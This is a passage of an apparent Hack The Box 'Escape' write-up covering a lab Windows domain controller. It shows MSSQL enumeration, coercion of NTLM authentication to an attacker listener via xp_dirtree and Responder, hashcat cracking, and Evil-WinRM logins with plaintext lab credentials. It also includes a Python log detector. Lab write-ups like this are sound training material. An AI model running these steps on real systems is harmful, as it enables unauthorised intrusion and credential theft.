msf6 auxiliary(admin/mssql/mssql_enum_sql_logins) > set rhosts sequel.htb
rhosts => sequel.htb
msf6 auxiliary(admin/mssql/mssql_enum_sql_logins) > set username PublicUser
username => PublicUser
msf6 auxiliary(admin/mssql/mssql_enum_sql_logins) > exploit
[*] Running module against 10.10.11.202
[*] 10.10.11.202:1433 - Attempting to connect to the database server at 10.10.11.202:1433 as PublicUser...
[...]
[*] 10.10.11.202:1433 - - PublicUser
[*] 10.10.11.202:1433 - - sa
[*] 10.10.11.202:1433 - - sequelAdministrator
[*] Auxiliary module execution completed
I omitted some of the exploits I ran and also omitted some sections of the information returned by the scans, so as not to take up too much reading time.
But let’s connect to the SQL Server instance and investigate the contents of the DBs.
┌──(in7rud3r㉿kali-muletto)-[~]
└─$ python3 /usr/share/doc/python3-impacket/examples/mssqlclient.py sequel.htb/PublicUser:GuestUserCantWrite1@10.10.11.202
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DCSQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DCSQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL> select @@version
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)
Sep 24 2019 13:48:23
Copyright (C) 2019 Microsoft Corporation
Express Edition (64-bit) on Windows Server 2019 Standard 10.0 <X64> (Build 17763: ) (Hypervisor)
SQL> SELECT name, database_id, create_date FROM sys.databases;
name database_id create_date
-------------------------------------------------------------------------------------------------------------------------------- ----------- -----------
master 1 2003-04-08 09:13:36
tempdb 2 2023-03-13 09:35:39
model 3 2003-04-08 09:13:36
msdb 4 2019-09-24 14:21:42
SQL> SELECT * FROM INFORMATION_SCHEMA.TABLES;
TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE
-------------------------------------------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------------------------- ----------
master dbo spt_fallback_db b'BASE TABLE'
master dbo spt_fallback_dev b'BASE TABLE'
master dbo spt_fallback_usg b'BASE TABLE'
master dbo spt_values b'VIEW'
master dbo spt_monitor b'BASE TABLE'
SQL> use tempdb
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: tempdb
[*] INFO(DCSQLMOCK): Line 1: Changed database context to 'tempdb'.
SQL> SELECT * FROM INFORMATION_SCHEMA.TABLES;
TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE
-------------------------------------------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------------------------- ----------
SQL> use model
[-] ERROR(DCSQLMOCK): Line 1: The server principal "PublicUser" is not able to access the database "model" under the current security context.
SQL> use msdb
[*] ENVCHANGE(DATABASE): Old Value: tempdb, New Value: msdb
[*] INFO(DCSQLMOCK): Line 1: Changed database context to 'msdb'.
SQL> SELECT * FROM INFORMATION_SCHEMA.TABLES;
TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE
-------------------------------------------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------------------------- ----------
msdb dbo syspolicy_policy_category_subscriptions b'VIEW'
msdb dbo syspolicy_system_health_state b'VIEW'
msdb dbo syspolicy_policy_execution_history b'VIEW'
msdb dbo syspolicy_policy_execution_history_details b'VIEW'
msdb dbo syspolicy_configuration b'VIEW'
msdb dbo syspolicy_conditions b'VIEW'
msdb dbo syspolicy_policy_categories b'VIEW'
msdb dbo sysdac_instances b'VIEW'
msdb dbo syspolicy_object_sets b'VIEW'
msdb dbo dm_hadr_automatic_seeding_history b'BASE TABLE'
msdb dbo syspolicy_policies b'VIEW'
msdb dbo backupmediaset b'BASE TABLE'
msdb dbo backupmediafamily b'BASE TABLE'
msdb dbo backupset b'BASE TABLE'
msdb dbo autoadmin_backup_configuration_summary b'VIEW'
msdb dbo backupfile b'BASE TABLE'
msdb dbo syspolicy_target_sets b'VIEW'
msdb dbo restorehistory b'BASE TABLE'
msdb dbo restorefile b'BASE TABLE'
msdb dbo syspolicy_target_set_levels b'VIEW'
msdb dbo restorefilegroup b'BASE TABLE'
msdb dbo logmarkhistory b'BASE TABLE'
msdb dbo suspect_pages b'BASE TABLE'
SQL>
Besides the SQL Server version, which may come in handy for identifying a specific exploit, the DB doesn’t seem to contain many schemas or tables. I tried some interesting system queries, but most of them returned “permission denied”. I therefore rely on the now official guide for identifying vulnerabilities.
Inside the guide we find an interesting attack worth trying.
The concept behind this attack is to force the SQL Server service to authenticate to a fake SMB server of ours, which captures the NetNTLMv2 challenge-response of the unsuspecting service account.
So, activate our responder…
┌──(in7rud3r㉿kali-muletto)-[~]
└─$ sudo responder -I tun0
[sudo] password for in7rud3r:
NBT-NS, LLMNR & MDNS Responder 3.1.3.0
To support this project:
Patreon -> https://www.patreon.com/PythonResponder
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.111]
Responder IPv6 [dead:beef:2::106d]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Current Session Variables:
Responder Machine Name [WIN-IM2J35A52MX]
Responder Domain Name [GFB0.LOCAL]
Responder DCE-RPC Port [47501]
[+] Listening for events...
…let’s take advantage of one of the Metasploit Framework exploits…
┌──(in7rud3r㉿kali-muletto)-[~]
└─$ msfconsole
=[ metasploit v6.3.4-dev ]
+ -- --=[ 2294 exploits - 1201 auxiliary - 409 post ]
+ -- --=[ 968 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Use help <command> to learn more
about any command
Metasploit Documentation: https://docs.metasploit.com/
msf6 > use auxiliary/admin/mssql/mssql_ntlm_stealer
msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > options
Module options (auxiliary/admin/mssql/mssql_ntlm_stealer):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password for the specified username
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 1433 yes The target port (TCP)
SMBPROXY 0.0.0.0 yes IP of SMB proxy or sniffer.
TDSENCRYPTION false yes Use TLS/SSL for TDS data "Force Encryption"
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME sa no The username to authenticate as
USE_WINDOWS_AUTHENT false yes Use windows authentification (requires DOMAIN option set)
View the full module info with the info, or info -d command.
msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > set password GuestUserCantWrite1
password => GuestUserCantWrite1
msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > set rhosts sequel.htb
rhosts => sequel.htb
msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > set username PublicUser
username => PublicUser
msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > set smbproxy 10.10.14.111
smbproxy => 10.10.14.111
msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > exploit
[*] 10.10.11.202:1433 - DONT FORGET to run a SMB capture or relay module!
[*] 10.10.11.202:1433 - Forcing SQL Server at 10.10.11.202 to auth to 10.10.14.111 via xp_dirtree...
[+] 10.10.11.202:1433 - Successfully executed xp_dirtree on 10.10.11.202
[+] 10.10.11.202:1433 - Go check your SMB relay or capture module for goodies!
[*] sequel.htb:1433 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
…and wait for the attacked service to fall into the trap.
┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.202 - Escape (win)/attack/dwnl]
└─$ cat NTLMv2-SSP.hash
sql_svc::sequel:5162e1326254c61a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
┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.202 - Escape (win)/attack/dwnl]
└─$ hashcat -m 5600 NTLMv2-SSP.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
/sys/class/hwmon/hwmon4/temp1_input: No such file or directory
OpenCL API (OpenCL 3.0 PoCL 3.1+debian Linux, None+Asserts, RELOC, SPIR, LLVM 14.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: pthread-penryn-Intel(R) Core(TM)2 Duo CPU T8300 @ 2.40GHz, 1410/2885 MB (512 MB allocatable), 2MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 0 MB
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 4 secs
Cracking performance lower than expected?
* Append -O to the commandline.
This lowers the maximum supported password/salt length (usually down to 32).
* Append -w 3 to the commandline.
This can cause your screen to lag.
* Append -S to the commandline.
This has a drastic speed impact but can be better for specific attacks.
Typical scenarios are a small wordlist but a large ruleset.
* Update your backend API runtime / driver the right way:
https://hashcat.net/faq/wrongdriver
* Create more work items to make use of your parallelization power:
https://hashcat.net/faq/morework
SQL_SVC::sequel:5162e1326254c61a:ec2bb7c31d6d9609ba2e60b95a70d405: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:REGGIE1234ronnie
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: SQL_SVC::sequel:5162e1326254c61a:ec2bb7c31d6d9609ba...000000
Time.Started.....: Sun Mar 19 05:29:14 2023 (30 secs)
Time.Estimated...: Sun Mar 19 05:29:44 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 395.6 kH/s (1.09ms) @ Accel:256 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10700288/14344385 (74.60%)
Rejected.........: 0/10700288 (0.00%)
Restore.Point....: 10699776/14344385 (74.59%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: REJONTE -> REESY15987
Hardware.Mon.#1..: Util: 91%
Started: Sun Mar 19 05:27:49 2023
Stopped: Sun Mar 19 05:29:46 2023
And after some waiting and patience, the password comes out. What better tool to use than Evil-WinRM?
┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.202 - Escape (win)/attack/dwnl]
└─$ evil-winrm -i 10.10.11.202 -u sql_svc -p REGGIE1234ronnie
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\sql_svc\Documents> whoami
sequel\sql_svc
*Evil-WinRM* PS C:\Users\sql_svc\Documents> dir /users
Directory: C:\users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/7/2023 8:58 AM Administrator
d-r--- 7/20/2021 12:23 PM Public
d----- 2/1/2023 6:37 PM Ryan.Cooper
d----- 2/7/2023 8:10 AM sql_svc
Obviously, this user can’t do much; a winPEAS session is needed. We load the scanner onto the BOX through the upload feature made available by Evil-WinRM…
Below is the information extracted from the winPEAS scan that I deemed worthy of note.
[...]
[+] WSUS
[i] You can inject 'fake' updates into non-SSL WSUS traffic (WSUXploit)
[?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#wsus
[...]
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
[...]
[+] DPAPI MASTER KEYS
[i] Use the Mimikatz 'dpapi::masterkey' module with appropriate arguments (/rpc) to decrypt
[?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#dpapi
Directory: C:\Users\sql_svc\AppData\Roaming\Microsoft\Protect
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 11/19/2022 3:11 AM S-1-5-21-4078382237-1492182817-2568127209-1106
[...]
C:\Windows\Panther\setupinfo
C:\Windows\System32\ntds.dit
C:\Windows\System32\config\SAM
C:\Windows\System32\config\SYSTEM
C:\Windows\System32\config\RegBack\SAM
C:\Windows\System32\config\RegBack\SYSTEM
[...]
Obviously, besides some interesting files, the output highlights the privileges available to the user (to be verified against actual vulnerabilities) and the WSUS Windows Update service, which is often abused precisely for privilege escalation. Let’s try to understand whether WSUS is really vulnerable here.
*Evil-WinRM* PS C:\Users\sql_svc> reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer
reg.exe : ERROR: The system was unable to find the specified registry key or value.
+ CategoryInfo : NotSpecified: (ERROR: The syst...y key or value.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
*Evil-WinRM* PS C:\Users\sql_svc> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg.exe : ERROR: The system was unable to find the specified registry key or value.
+ CategoryInfo : NotSpecified: (ERROR: The syst...y key or value.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
*Evil-WinRM* PS C:\Users\sql_svc> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg.exe : ERROR: The system was unable to find the specified registry key or value.
+ CategoryInfo : NotSpecified: (ERROR: The syst...y key or value.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
*Evil-WinRM* PS C:\Users\sql_svc\Documents> reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer
reg.exe : ERROR: The system was unable to find the specified registry key or value.
+ CategoryInfo : NotSpecified: (ERROR: The syst...y key or value.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
*Evil-WinRM* PS C:\Users\sql_svc\Documents> reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate\AU
*Evil-WinRM* PS C:\Users\sql_svc\Documents> reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate\AU
AUOptions REG_DWORD 0x3
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate\AU\NoAutoUpdate
*Evil-WinRM* PS C:\Users\sql_svc\Documents>
Already from the Windows registry keys there doesn’t seem to be any hope: no WUServer is configured, so the WSUS path is out, and AlwaysInstallElevated is not set either. Even on the privileges front nothing particularly attractive stands out; the master key of the user Ryan would be needed, but at the moment it doesn’t seem to be available. Let’s try some other tools, for example PrivescCheck.
Also in this case, I report only the interesting and noteworthy things.
[...]
+------+------------------------------------------------+------+
| TEST | APPS > Non-default Apps | INFO |
+------+------------------------------------------------+------+
| DESC | Enumerate non-default and third-party applications by |
| | parsing the registry. |
+------+-------------------------------------------------------+
[*] Found 6 result(s).
Name FullName
---- --------
Microsoft SQL Server C:\Program Files (x86)\Microsoft SQL Server
Microsoft C:\Program Files\Microsoft
Microsoft SQL Server C:\Program Files\Microsoft SQL Server
Microsoft Visual Studio 10.0 C:\Program Files\Microsoft Visual Studio 10.0
VMware C:\Program Files\VMware
VMware Tools C:\Program Files\VMware\VMware Tools
[...]
+------+------------------------------------------------+------+
| TEST | UPDATES > System up to date? (info) | INFO |
+------+------------------------------------------------+------+
| DESC | Enumerate the installed updates and hotfixes by |
| | parsing the registry. If this fails, the check will |
| | fall back to the built-in 'Get-HotFix' cmdlet. |
+------+-------------------------------------------------------+
[*] Found 9 result(s).
HotFixID Description InstalledBy InstalledOn
-------- ----------- ----------- -----------
KB5011551 Update NT AUTHORITY\SYSTEM 2023-02-02 - 13:18:08
KB5011574 Update sequel\Administrator 2023-02-02 - 12:07:20
KB4512578 Security Update sequel\Administrator 2023-02-01 - 23:13:20
KB4589208 Update NT AUTHORITY\SYSTEM 2023-02-01 - 21:10:30
KB5012170 Security Update sequel\Administrator 2023-02-01 - 21:00:27
KB5020374 Security Update NT AUTHORITY\SYSTEM 2023-02-01 - 19:29:33
KB4512577 Security Update S-1-5-21-89493159-3068390195-4120627384-1047 2019-09-06 - 17:24:38
KB5020866 Update 1600-12-31 - 16:00:00
KB4514366 Update 1600-12-31 - 16:00:00
[...]
+------+------------------------------------------------+------+
| TEST | UPDATES > System up to date? | VULN |
+------+------------------------------------------------+------+
| DESC | Enumerate the installed updates and hotfixes and |
| | check whether a patch was applied in the last 31 |
| | days. |
[*] Found 1 result(s).
HotFixID Description InstalledBy InstalledOn
-------- ----------- ----------- -----------
KB5011551 Update NT AUTHORITY\SYSTEM 2023-02-02 - 13:18:08
[...]
+------+------------------------------------------------+------+
| TEST | MISC > OS Version | INFO |
+------+------------------------------------------------+------+
| DESC | Print the detailed version number of the Operating |
| | System. If we can't get the update history, this |
| | might be useful. |
+------+-------------------------------------------------------+
[*] Found 1 result(s).
Name Version
---- -------
Windows Server 2019 Standard 10.0.17763 Version 1809 (17763.2746)
[...]
We get to a point where the use of the classic Windows AD tools becomes essential, so let’s try BloodHound.
*Evil-WinRM* PS C:\Users\sql_svc> upload ./attack/upld/SharpHound.exe ../sh.exe
Info: Uploading ./attack/upld/SharpHound.exe to ../sh.exe
Data: 1402196 bytes of 1402196 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\sql_svc> ./sh.exe -c All --zipfilename output.zip
2023-03-25T23:50:54.5149380-07:00|INFORMATION|This version of SharpHound is compatible with the 4.2 Release of BloodHound
2023-03-25T23:50:54.6555838-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2023-03-25T23:50:54.6868023-07:00|INFORMATION|Initializing SharpHound at 11:50 PM on 3/25/2023
2023-03-25T23:50:55.0305487-07:00|INFORMATION|Loaded cache with stats: 56 ID to type mappings.
56 name to SID mappings.
0 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2023-03-25T23:50:55.0461913-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2023-03-25T23:50:55.1868496-07:00|INFORMATION|Beginning LDAP search for sequel.htb
2023-03-25T23:50:55.2336792-07:00|INFORMATION|Producer has finished, closing LDAP channel
2023-03-25T23:50:55.2336792-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2023-03-25T23:51:25.2383915-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 40 MB RAM
2023-03-25T23:51:39.5292927-07:00|INFORMATION|Consumers finished, closing output channel
Closing writers
2023-03-25T23:51:39.5605157-07:00|INFORMATION|Output channel closed, waiting for output task to complete
2023-03-25T23:51:39.6386454-07:00|INFORMATION|Status: 97 objects finished (+97 2.204545)/s -- Using 42 MB RAM
2023-03-25T23:51:39.6386454-07:00|INFORMATION|Enumeration finished in 00:00:44.4448376
2023-03-25T23:51:39.7011650-07:00|INFORMATION|Saving cache with stats: 56 ID to type mappings.
56 name to SID mappings.
0 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2023-03-25T23:51:39.7167826-07:00|INFORMATION|SharpHound Enumeration Completed at 11:51 PM on 3/25/2023! Happy Graphing!
*Evil-WinRM* PS C:\Users\sql_svc> download ./20230325235139_output.zip ./attack/dwnl/20230325235139_output.zip
Info: Downloading ./20230325235139_output.zip to ./attack/dwnl/20230325235139_output.zip
Info: Download successful!
*Evil-WinRM* PS C:\Users\sql_svc>
…and analyze the result.
┌──(in7rud3r㉿kali-muletto)-[~]
└─$ xhost +local:$(id -nu)
non-network local connections being added to access control list
┌──(in7rud3r㉿kali-muletto)-[~]
└─$ sudo docker run -it \
-p 7474:7474 \
-p 7687:7687 \
-e DISPLAY=unix$DISPLAY \
-v /tmp/.X11-unix:/tmp/.X11-unix \
--device=/dev/dri:/dev/dri \
-v ~/temp:/data \
--network host \
--name bloodhound belane/bloodhound
WARNING: Published ports are discarded when using host network mode
Selecting JVM - Version:11.0.16+8-post-Debian-1deb11u1, Name:OpenJDK 64-Bit Server VM, Vendor:Debian
Changed password for user 'neo4j'. IMPORTANT: this change will only take effect if performed before the database is started for the first time.
Directories in use:
home: /var/lib/neo4j
config: /etc/neo4j
logs: /var/log/neo4j
plugins: /var/lib/neo4j/plugins
import: /var/lib/neo4j/import
data: /var/lib/neo4j/data
certificates: /var/lib/neo4j/certificates
licenses: /var/lib/neo4j/licenses
run: /var/lib/neo4j/run
Starting Neo4j.
Started neo4j (pid:84). It is available at http://localhost:7474
There may be a short delay until the server is ready.
*** Log in with bolt://127.0.0.1:7687 (neo4j:blood) ***
I use the containerized version, so wait for Neo4j to become available.
Once logged in, upload the collected data (the zip file directly). Now, in the search box, look for the user you own, sql_svc; select it and mark it as owned. Search for the Ryan user account, select it, right-click and choose “shortest path from owned to here”.
Well, the path is long enough, but the tool crashes as soon as I try to investigate the third link. Nonetheless, the information from the previous nodes highlights standard attacks that I’ve faced in the past. Let’s try them quickly.
*Evil-WinRM* PS C:\Users\sql_svc\Documents> cscript.exe missingkbs.vbs
Microsoft (R) Windows Script Host Version 5.812
Copyright (C) Microsoft Corporation. All rights reserved.
Windows Exploit Suggester: Missing KBs Identifier v1.0
https://github.com/bitsadmin/wesng/
cscript.exe : [-] This script needs to be executed as an elevated Administrator
+ CategoryInfo : NotSpecified: ([-] This script...d Administrator:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
Exhausted and out of ideas, I abandon the goal for a few days (needless to say, when you bang your head too long against the same apparently unsolvable problem, disconnect… let your mind refresh and empty, then face the problem again).
As you can see, I was stubborn in the search for an advanced exploit, and my belief that the solution depended on one kept my eyes fixed on a dead end in which I stayed closed for several days. But sometimes simplicity and banality are the most improbable and unexpected ways.
So I go back to the machine after a few days and, with the memory of all the attempts tried up to that moment, I go back to having a look at the resources available from the shell. I then find a folder in the root of C: containing what appears to be the SQL Server installation package and a couple of other directories, one of which contains a backup file.
*Evil-WinRM* PS C:\sqlserver> dir -force
Directory: C:\sqlserver
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/7/2023 8:06 AM Logs
d----- 11/18/2022 1:37 PM SQLEXPR_2019
-a---- 11/18/2022 1:35 PM 6379936 sqlexpress.exe
-a---- 11/18/2022 1:36 PM 268090448 SQLEXPR_x64_ENU.exe
*Evil-WinRM* PS C:\sqlserver> cd logs
*Evil-WinRM* PS C:\sqlserver\logs> dir -force
Directory: C:\sqlserver\logs
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/7/2023 8:06 AM 27608 ERRORLOG.BAK
I start sifting through the log file and find two consecutive failed logons within a few… hundredths of a second (it seems a bit exaggerated to me, but we’ll stick to the clues): the first for the Ryan.Cooper account, the second for a “user” that looks very much like a password typed into the wrong field.
*Evil-WinRM* PS C:\sqlserver\logs> type ERRORLOG.BAK
2022-11-18 13:43:05.96 Server Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)
Sep 24 2019 13:48:23
Copyright (C) 2019 Microsoft Corporation
Express Edition (64-bit) on Windows Server 2019 Standard Evaluation 10.0 <X64> (Build 17763: ) (Hypervisor)
[...]
2022-11-18 13:43:07.44 spid51 Changed database context to 'master'.
2022-11-18 13:43:07.44 spid51 Changed language setting to us_english.
2022-11-18 13:43:07.44 Logon Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.44 Logon Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.72 spid51 Attempting to load library 'xpstar.dll' into memory. This is an informational message only. No user action is required.
[...]
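A detection that turns the clue above into a rule (an added example of mine, not part of the original writeup): parse SQL Server ERRORLOG “Logon failed” lines and flag a failure whose login name is not account-shaped and that arrives, from the same client, within a couple of seconds of a failure for a real account, which is the typical signature of a password typed into the username field. The sample log is constructed from the two lines above plus two benign bursts; the 2-second window and the list of known SQL logins are assumptions.

```python
import re
from datetime import datetime, timedelta

# SQL Server ERRORLOG "Logon failed" entry, as printed by SQL Server 2019:
# 2022-11-18 13:43:07.44 Logon  Logon failed for user 'DOMAIN\user'. Reason: ... [CLIENT: 1.2.3.4]
LOGON_FAILED = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2})\s+Logon\s+"
    r"Logon failed for user '(?P<user>[^']*)'\..*\[CLIENT: (?P<client>[^\]]+)\]"
)

# Constructed sample: the two lines from ERRORLOG.BAK above plus two benign
# bursts (a brute-force on 'sa' and a service account retrying its own password).
SAMPLE_LOG = """\
2022-11-18 13:43:07.44 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.44 Logon       Logon failed for user 'sequel.htb\\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon       Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:45:10.10 Logon       Logon failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.7]
2022-11-18 13:45:10.30 Logon       Logon failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.7]
2022-11-18 13:50:00.00 Logon       Logon failed for user 'sequel.htb\\svc_backup'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.9]
2022-11-18 13:50:00.05 Logon       Logon failed for user 'sequel.htb\\svc_backup'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.9]
"""

# SQL logins that carry no domain prefix but are legitimate account names (assumed list).
KNOWN_SQL_LOGINS = frozenset({"sa", "publicuser"})


def parse_failed_logons(log_text):
    """Return (timestamp, login_name, client_ip) for every 'Logon failed' line."""
    events = []
    for line in log_text.splitlines():
        m = LOGON_FAILED.match(line.strip())
        if m:
            ts = datetime.strptime(m.group("ts"), "%Y-%m-%d %H:%M:%S.%f")
            events.append((ts, m.group("user"), m.group("client")))
    return events


def looks_like_account(name):
    """DOMAIN\\user, user@domain and known SQL logins are account-shaped; anything
    else (no separator, not a known login) is treated as a possible secret."""
    return "\\" in name or "@" in name or name.lower() in KNOWN_SQL_LOGINS


def find_password_in_username(log_text, window=timedelta(seconds=2)):
    """Flag a failed logon whose name is not account-shaped and that follows, from
    the same client and within `window`, a failed logon for a real account.
    The suspect string itself is never copied into the finding, since it is
    probably a password; only its length is reported."""
    events = parse_failed_logons(log_text)
    findings = []
    for (prev_ts, prev_user, prev_client), (ts, user, client) in zip(events, events[1:]):
        if (client == prev_client
                and timedelta(0) <= ts - prev_ts <= window
                and looks_like_account(prev_user)
                and not looks_like_account(user)):
            findings.append({
                "time": ts.isoformat(sep=" "),
                "client": client,
                "account": prev_user,        # whose password probably leaked
                "suspect_length": len(user),
            })
    return findings


if __name__ == "__main__":
    for f in find_password_in_username(SAMPLE_LOG):
        print(f"[!] {f['time']} client {f['client']}: possible password for "
              f"{f['account']} logged in the username field ({f['suspect_length']} chars)")
```

The same rule applies to any ERRORLOG or ERRORLOG.BAK, and the leaked value should be rotated rather than copied into the alert.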
All we have to do is reconnect with Evil-WinRM using the new credentials.
┌──(in7rud3r㉿kali-muletto)-[~/…/_10.10.11.202 - Escape (win)/attack/upld/sggstr]
└─$ evil-winrm -i 10.10.11.202 -u Ryan.Cooper -p NuclearMosquito3
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
